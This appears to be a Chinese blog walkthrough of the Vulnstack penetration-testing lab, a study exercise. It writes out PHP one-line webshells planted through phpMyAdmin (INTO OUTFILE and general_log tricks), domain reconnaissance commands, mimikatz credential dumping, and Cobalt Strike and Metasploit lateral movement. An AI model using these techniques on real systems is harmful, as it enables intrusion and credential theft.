码迷,mamicode.com
首页 > 其他好文 > 详细

Vulnstack靶机学习一(上)

时间:2020-07-20 10:55:20      阅读:144      评论:0      收藏:0      [点我收藏+]

标签:tcp   src   get   添加   学习   ISE   bin   account   路径   

一、前言

     这个是红日的一个靶机,http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

  并未按照介绍里的点一个一个走,简单记录下过程。

  环境搭建:设置Win2K3 仅主机模式;winserver08 仅主机模式;win7添加一个网卡,一个设为仅主机模式,另一个设为NAT模式;攻击机设为NAT模式。

  登录win7,可能要修改密码。然后进入C:\phpStudy\文件下运行phpstudy.exe

  攻击机IP:192.168.157.137

二、信息搜集

  

nmap 192.168.157.0/24 -n -sP -sn

发现win7的IP为 192.168.157.138 ,探测开启的服务

nmap 192.168.157.138 -O -sS -sV -v

技术图片

 

 

 访问http://192.168.157.138/发现是一个PHP探针,能看到绝对路径

技术图片

 

对目录进行爆破

 

 

dirb http://192.168.157.138/

发现了http://192.168.157.138/phpmyadmin/index.php

技术图片

 

 

 发现弱密码root/root进入后台

三、phpMyAdmin get shell

  1. 利用select into outfile 写入shell

先查看能否自定义导出文件目录的权限,结果为NULL意味着不允许导入导出数据到目录。且只能在my.ini进行配置。

SHOW VARIABLES LIKE "secure_file_priv";

 

技术图片

 

 

 如果能将my.inisecure_file_prive并将其值设置为""或"/",并重启MySQL服务

select <?php @eval($_POST[pass]);?> into outfile c:/phpstudy/www/shell.php;

进行一句话写shell

  2. 利用日志写shell

查看全局变量 general_log、general_log_file

SHOW VARIABLES LIKE "general_log%";

技术图片

 

 

 general_log 默认关闭,,general_log_file为日志储存路径。

写shell的思路:更改general_log的值,将日志储存在能访问的路径下,且后缀名为php。然后通过log日志进行写入一句话木马,然后再进一步利用。

set global general_log = "ON";
set global general_log_file = "C:/phpStudy/WWW/shell.php";

然后在日志中插入一句话

SELECT <?php eval($_POST["pass"]);?>

用蚁剑连接http://192.168.157.138/shell.php

 

 

 技术图片

 

四、内网信息搜集

利用蚁剑虚拟端进行信息搜集,发现在执行net view一些命令时无回显,利用CS生成木马,回连beacon。因为是靶机调整心跳为1s。

技术图片

 

 

 记录常用的信息搜集命令,cs运行shell命令时需加 "shell 命令",eg: "shell net view"

ipconfig /all
net view
net view /domain
net time /domain
能够执行,说明此台机器在域中 (若是此命令在显示域处显示 WORKGROUP,则不存在域,若是报错:发生系统错误 5,则存在域,但该用户不是域用户)
net config workstation 查询当前的登录域与用户信息
net lookup “域名”  nslookup 命令直接解析域名服务器
net user /domain  查看当前域的所有用户
wmic useraccount get /all 获取域内用户的详细信息
net group "domain computers" /domain 查看所有域成员计算机列表
net group "domain admins" /domain 查看所有域控管理人员
net group "domain controllers" /domain 查看与控制管理器
net group "enterprise admins" /domain 查看企业管理组
net localgroup administrators /domain 查看域控,升级为域控时,本地账户也成为域管
net accounts /domain 获取域密码信息
nltest /domain_trusts 获取域信任列表

 

通过信息搜集知道了域控IP、域控管理员、域内其他计算机。然后利用svc-exe进行提权

技术图片

 

 利用mimikatz抓取密码导出凭证

技术图片

 

 

 五、横向移动

此时执行net view已经发现域控和另一台机器,利用导出的凭证能直接登录。

CS派生session给msf

现在msf监听,通讯类型要与cs保持一致

msf:

技术图片

 

 

 cs:

技术图片

 

 

 kali上面执行,连接session解释派生出来的会话

sessions
sessions -i 1

因为知道域控和另一台机器再192.168.52.0/24段

添加路由:

技术图片

 

 

 尝试了MS17-010、MS08-067未果。到这只是记录下cs结合msf的运用,同理msf也可以派生session给cs。前面导出的凭证登录域内两台机器

创建一个bind_tcp的listener 针对目标机器点击psexec

技术图片

 

但是在OWA用凭证登录的时候,发现不能连接上,怀疑被拦了。这里使用beacon SMB listener

SMB Beacon 使用命名管道通过父级 Beacon 进行通讯,当两个 Beacons 链接后,子 Beacon 从父 Beacon 获取到任务并发送。因为链接的 Beacons 使用 Windows 命名管道进行通信,此流量封装在 SMB 协议中,所以 SMB Beacon 相对隐蔽,绕防火墙时可能发挥奇效。

技术图片

 

再次创建一个SMB listener ,从已有的beacon上面spwn,选择创建的listener

然后再登陆凭证,OWA上线。

 

Vulnstack靶机学习一(上)

标签:tcp   src   get   添加   学习   ISE   bin   account   路径   

原文地址:https://www.cnblogs.com/yuuki-aptx/p/13343037.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!